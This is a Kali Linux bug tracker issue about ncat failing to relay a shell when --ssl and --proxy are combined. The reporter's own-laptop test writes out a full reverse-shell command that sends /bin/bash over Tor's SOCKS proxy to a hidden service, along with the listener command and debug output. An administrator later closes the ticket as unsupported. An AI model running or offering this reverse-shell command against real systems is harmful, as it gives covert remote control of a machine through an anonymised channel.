View Issue Details

ID: 0002628
Project: Kali Linux
Category: General Bug
View Status: public
Last Update: 2018-01-29 12:25
Reporter: pkreuzt
Assigned To: g0tmi1k
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: suspended
Product Version: 2.0
Summary: 0002628: ncat-6.49BETA4 fails to bind executable when using --ssl and --proxy
Description

I'm trying to backdoor my own laptop in a proof of concept of a reverse shell using the Tor network. So I set up a hidden service and a listening ncat on a desktop computer with Kali-2.0. The laptop also runs Kali-2.0 with ncat to bind a shell through Tor to the hidden service. This is what I get on the slave side:

~$ ncat --ssl -vvv --proxy-type socks5 --proxy 127.0.0.1:9050 myhiddenservice.onion 1234 -e /bin/bash
Ncat: Version 6.49BETA4 ( http://nmap.org/ncat )
NCAT DEBUG: Using system default trusted CA certificates and those in /etc/ssl/certs/ca-certificates.crt.
NCAT DEBUG: Not doing certificate verification.
Ncat: Connected to proxy 127.0.0.1:9050
Ncat: No authentication needed.
Ncat: connection succeeded.
libnsock nsi_new2(): nsi_new (IOD 0000001)
libnsock nsi_new2(): nsi_new (IOD #2)
NCAT DEBUG: Executing: /bin/bash

Up to that point, all is fine. On the other side:

~$ ncat --ssl -l -vvv -p 1234
Ncat: Version 6.49BETA4 ( http://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: CC20 6775 3F79 3376 4BB8 F3A5 9A8F BD59 3768 0DA8
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::1234
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:1234
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
Ncat: Connection from 127.0.0.1.
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 127.0.0.1:52133.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5

[ Here I type some commands, which don't show any output ]
whoami
ls
exit

Even the "exit" is not executed; I have to hit Ctrl-C to stop.
If I hit ctrl-c on the other side (backdoored system) I get the following error on the listening side:

Ncat: Failed SSL connection from 127.0.0.1: error:00000000:lib(0):func(0):reason(0)

And then the retained commands are executed on the shell. This seems to only happen when using --ssl; without it everything runs as expected. Also, when not using --proxy it works correctly with --ssl.

Activities

g0tmi1k

2018-01-29 12:25

administrator   ~0008112

Due to the age of the OS (Kali Moto [v1], Kali Safi [v2], Kali Rolling 2016.x), these legacy versions are no longer supported.
We will be closing this ticket due to inactivity.

Please could you see if you are able to replicate this issue with the latest version of Kali Linux (https://www.kali.org/downloads/)?

If you are still facing the same problem, feel free to re-open the ticket. If you choose to do this, could you provide more information about the issue you are facing, and also give information about your setup?
For more information, please read: https://kali.training/topic/filing-a-good-bug-report/

Issue History

Date Modified      Username   Field               Change
2015-09-08 03:02   pkreuzt    New Issue
2018-01-29 12:25   g0tmi1k    Assigned To         => g0tmi1k
2018-01-29 12:25   g0tmi1k    Status              new => closed
2018-01-29 12:25   g0tmi1k    Resolution          open => suspended
2018-01-29 12:25   g0tmi1k    Note Added: 0008112